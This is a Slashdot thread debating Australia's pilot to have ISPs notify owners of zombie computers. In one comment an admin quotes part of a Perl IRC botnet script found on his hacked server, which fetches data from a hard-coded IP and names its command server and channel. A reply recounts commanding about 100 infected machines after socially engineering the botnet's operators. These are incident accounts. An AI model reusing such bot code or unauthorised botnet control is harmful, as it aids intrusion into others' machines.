AU Government To Pilot Target Zombies

msblack writes " Australian news sources are reporting that the communication regulators will begin notifying ISPs of infected customer computers. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?"

No regulation for me.

[jellomizer]

"When will U.S. regulators"..."get on board?"

Well I hope never. ISP should have rights to protect their network so they should be allowed to stop Zombie systems when they feel like it. But for U.S. regulation. I say No way. All regulation does is make loopholes for the bad guys and road blocks to the good guys. ISP should be willing to work with their customers to insure this doesn't happen, that is why a lot of ISP are offing free protection software to their windows users, partially because other big names are doing it so they can stay competitive, and partially because with less spam and viruses on their network they can more easily manage it. With US Government control it will be like your system is a Zombie and Fix it. To most people who only have a passing idea what a virus or spyware/addware is, most really won't know much how to fix it if it doesn't require clicking one button and then selecting the default for all questions. So if it is anything of a difficult fix, or requires hireing expensive techs to fix it they will toss their computer saying it is broken, or sue ISPs and the Government for disconnecting their ISP without giving them a means to remove it. Also systems like P2P, BitTorrent, and some distributive computing systems, all with legal uses, could be considered a zombie system to some some people like the Entertainment industry and can use that to force all people using the technology even for non entertainment uses (such as downloading Linux distros)
Government control adds rigidly defined rules to a flexible universe and often will cause more harm then good.

Re:No regulation for me.

[misleb]

This isn't true. I worked for an ISP which was dilligent about working with customers to clean up PCs. They are surprisingly coorporative. They don't like the idea of their computer be infected any more than you do. You just have to be diplomatic about it. Don't blame them. Just give them the tools to clean and keep clean their computers.

-matthew

Don't forget the other monsters

[LiquidCoooled]

Zombies are just one type, we need to start identifying the Vampires and ghouls.

They cause MUCH more havoc than simple zombies.

dangerous

and how long will it be before they ask my ISP to disconnect me because I'm running P2P software, making me a dangerous music thief?

slippery slope!

USA ISP's

[vasqzr]

In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?

Our local cable and DSL providers are always shutting connections off for userse who's computers are virus-ridden. If your PC is acting as an open spam proxy or found to be connecting to zombie-networks, they shut you off, and you have to call to find out why. They recommend a service or software to help clean your PC, and they won't let you back on until you're free of any malware.

It's been like this for...years?

They won't

[keraneuology]

When we still have (at least one) state attorney general who believes that spam is protected by the first amendment, government regulators won't get involved. Except possibly during an election year when they might pass a toothless law that does nothing but confuse the confused.

Pure, raw, unadulterated situation: congress doesn't care. The big ISPs don't care. They have had 10 years to address the situation and have refused all along. They are, however, willing to pass laws preventing unsecured wireless access points. Given a choice between lending support to MPAA/RIAA or actually addressing a serious problem, be it hacking, phishing, worms, viral attacks, DDOS attacks or any other legitimate issue.... look at it like this: how quickly have they acted to prevent the zombie issue? How quickly did they act to try and sneak the broadcast flag into law. Again? Or again?

Start writing campaign checks and picking up the tab for "fact finding missions" to Hawaii for a senator or ten... then you might find some interest on the hill.

I got excited for a second

[illtron]

I got my hopes up for a second. I though, "Finally! Those fat cats in Canberra are taking some action to prepare for the immanant impending zombie pandemic."

My elation was premature. This is just some lame story about computers sending spam.

Come on people! We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!

Carte Blanche for ISPs?

[badzilla]

From TFA: Anthony Wing, manager of the anti-spam team at the ACMA [said] that the application, which took "some months" to build, can identify computers [...] that are being used for "illicit reasons".

I agree botnets are a problem and that my ISP has a right to stop me from being a nuisance to the rest of the internet. But outside of that do I really want my ISP taking broad arbitrary decisions on what I can do with my connection?

This is foolproof

[Dekortage]

From the article: "Anthony Wing, manager of the anti-spam team at the ACMA, told ZDNet UK sister site ZDNet Australia that the application, which took "some months" to build, can identify computers physically located in Australia that are being used for "illicit reasons".

"[The application] identifies IP addresses that have been used for illicit reasons -- for example spamming," Wing said. "There are a range of sensors around that world that identify them. Those infected IP addresses are then fed to the relevant ISP. They know who their customers are so that can contact them... if the computer remains a threat to other Internet users, the ISPs may take steps under their acceptable use policy to disconnect the computer until the problem is resolved".

...The ISPs will then be responsible for contacting their customers and helping them disinfect their computers.

This is great, assuming that:

1. Hackers won't get a copy of this software and find ways of circumventing it.
2. "Illicit" computer operators aren't spoofing their IP addresses.
3. ISPs don't abuse the interpretation of the words "threat" or "acceptable use".
4. The process of "helping" users disinfect computers does not compromise user's privacy.

Re:When will people learn?

[jdredd]

Seriously? It's hard... People don't understand the implications of clicking on the button. They just like the weather bug and other programs. Seriously too... most of that crap isn't going to be installed via a nice popup box that lets you decide. Go look at all the browser security holes, viruses, and worms in the last 3 years that allow for installation of backdoors, SMTP engines, and more. As long as people make money via phishing, selling herbal viagra, and telling you how to lengthen your penis, you will be fighting this crap. It's moved from people doing it for kicks to people doing it for money and identity theft - well, that's for even more money. It doesn't take much money to create a virus or worm. There are plenty of people out there that will do it for a little cash. The window of time between when patches come out and exploits for the hole has shortened drastically over the last couple of years... from months to days. You want a shock? Go run AdAware or Spybot Search & Destroy on your parents' computer. Then make sure to educate them about phishing before your inheritance disappears.

Censorship?

[Zontar+The+Mindless]

I think not. Free speech does not include the right to shout "Fire!" in a crowded theatre, and free use of the Internet does not include the right to allow your machines to stuff it up for the rest of us.

As a Telstra customer who saw his cable connection slow to about 1/100th of its normal speed thanks to the DNS attacks of a few months ago, I'm glad to see someone doing something about the problem.

Why don't they target IRCops?

[t0qer]

I'm a broke geek. I host my website on a machine on a machine in my house. Last few weeks i've caught my machine being used for zombie purposes. Attack vector was a vulerability in phpnuke.

Let me explain "why I use that holy peice of shit"

The website has a decent sized community. It's also going to be a pain in the butt transferring to something else (i'm thinking vbulletin) and i've never had a problem before the recent round of nuke upgrades. 3 according to the advisories the only patch is to get off phpnuke (again, wonderful)

So today the website freezes up again. Thanks to the fact that i'm dot com broke now I basically sit here all day updating my forums, reading other forums, getting up ocassionally to warm up a microwave burrito and wait for the day Bill Gates makes all of us former window admins disapear to redmond in the great microsoft rapture of 2006.

Ok.. SSH into the machine. Same as before, same exploit.

poo:~# ls /tmp -al
total 20
drwxrwxrwt 5 root root 4096 Nov 6 14:55 .
drwxr-xr-x 22 root root 4096 Sep 16 14:38 ..
drwxrwxrwt 2 www www 4096 Nov 6 09:40 r0nin
drwxrwxrwt 2 root root 4096 Nov 6 09:40 bot.txt
drwxr-xr-x 2 root root 4096 Nov 6 10:00 enviar.pl

Oh you sons of bitches, you done gone fucked with an admin with nothing better to do than to track you down. I firewalled off port 80, copied the offending files out of tmp and change permissions. Googling revealed r0nin is some kind of shell server. Since 80 and 22 are the only ports open to this machine, they would run it on 80, crashing my website.

Then I looked at enviar.pl. It was just a stupid email script. Nothing notable.

Finally I looked at bot.txt.

# IRC
my @adms=("bigfirex"); #nick dos administradores
my @canais=("#testebot");
use LWP::Simple;
my $dados=get("http://66.185.162.241/...fusao/nick/in dex.php");
my $nick=$dados; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final
my $ircname = $dados;
chop (my $realname = `uname -n`);
$servidor='irc.igs.ca' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento
my $porta='6667'; #porta do servidor d irc

Ahh here it got interesting. I now had a IRC channel, with a room name. I tried connecting, but my machine was banned from the irc server.

I ended up ssh'ing to a customer account I had running at he.net, and firing up BitchX from there. A few minutes later I was in the chatroom #testebot with our magical master of ceremonies "bigfirex"

I sat there for a while seeing folks pop in and out. I asked the room "could you tell me exactly how you're exploiting my machine and would you please not do it again?" No answer from bigfirex.

I decided to ask an IRCop for help. Surely seeing the evidence (I could have provided him shorewall and apache logs) he would take immidiate action banning this guy from the network.

I did a /who 0 and found an IRC op from IGS.ca Below is a log of the chat I had with him.

[msg(elsif)] hi are you an ircop?
[elsif(jake@admin.igs.ca)] sure
[msg(elsif)] someone on your network hacked my webserver and installed a bot, i tracked them back to here
[msg(elsif)] The bot is being run by a user named .bigfirex. in a channel called #testebot.
[elsif(jake@admin.igs.ca)] sucky. you do know that he.net runs a server on this network, irc.he.net?
[msg(elsif)] actually im just using a shell i have there, the ip for my comprimised machine was banned from this
network
[elsif(jake@admin.igs.ca)] k. I don't know what I can really do for you. I don't know that person and all.
[elsif(jake@admin.igs.ca)] lots of machines are compromised with ircbot trojans that come here in order to get their

Re:Why don't they target IRCops?

[ivan+kk]

By posting on slashdot, at least the odd geek or two will be sure to send off a few msgs to the ircops.

However, it isn't their job to enforce controls that you deem necessary. We can use the example of bit torrent trackers. The irc server is like a bit torrent tracker. The owner/operator of the tracker is not responsibile for the torrents (in your case irc channels) that use his server/tracker. What's to stop the botnet operator from moving to another network?

This actually happened to me once. One of my friends machines was r00ted, and he asked me to help him out. So what I did was to run lsof, to grab a list of opened files.
I ran strings on some of the binaries I came across, found an irc channel, and joined it. When someone found out that I wasn't supposed to be their, I was kickbanned. I ssh'd to another machine, changed my ident and nick to match their patterns and joined the chan. I also spoke with the admin via pm, to find out what was going on etc.
Turns out it was a couple of malaysian kids, running an irc server on a hacked machine with a carded domain name. They told me how the binary works, that it would only respond to a particular nickname, not requiring a password. I tried to change to that nick, and the services bot banned me.
Connecting again from another IP, I realised services was running on a separate machine, and assuming hacked machines don't have the highest of stabilities, I joined the chan again, and wrote a script to disinfect all of the 100 or so other machines in the channel. So, armed with the knowledge I'd gathered from these kids after befriending them, and promising them several 0day exploits, and a stable shell (to run an irc server), I found out everything I needed to remove the program.
Staying connected this time, the script would wait until the services bot dropped its connection, at which point I changed my nickname, told all 100 machines to edit their crontab, and to kill -9 the program. The malaysian kids came back, utterly disappointed that their efforts were wasted, removed the domain, killed the irc server, and haven't been heard from since (however they may have simply gotten better at what they did).

Anyway, to bring a long story to a close, keep on tracking it, run the binary, or program from a machine you don't mind having compromised, sniff with ettercap, befriend your attackers (socially engineer them), and responsibly eliminate their arsenal, you'll save other admins the trouble (too bad they probably won't even know about it).
Good luck with it.

Re:Why don't they target IRCops?

[spinfire]

The IRCop is right. It is very difficult to track this stuff down, and it is a pain. Believe me, if I was in his position I'd be pretty ticked at you, as your compromised machine was reponsible for abusing his network and it even looks like your box got banned from the network. You're even guilty of ban evasion!

I am an IRCop on a very small network which had a botnet problem last year. Hundreds and hundreds of bots would connect, all joining channels. We wrote scripts to ban all the bots, upgraded services, the whole lot. They keep coming. Some of them came to new channels. The "owners" hadn't showed up at this point, not even once. After around 5 days some people showed up in those channels from ISPs in the middle east. I did track them down, and sent abuse emails to their ISPs. Got a response in a few days, offending account shut down. But that account was probably another 0wned box anyways.

Unfortunately sending ISP abuse emails to all of the bot IPs was much too daunting a task for a small time IRC network.

Keeping unwanted things off an IRC network is hard work. Kiddies often have hundreds of open proxy and otherwise usable IPs to use for ban evasion.

I hate to be brutally honest, but you share a lot of responsibility. *Your* IP was abusing his system.

When will U.S. regulators and ISPs get on board?

[Yonder+Way]

Hopefully never. Well, U.S. regulators anyway.

ISP's should be protecting their own networks. Saved bandwidth costs alone should be enough reason for them to want to detect and block zombies. The last thing we need is more government intervention.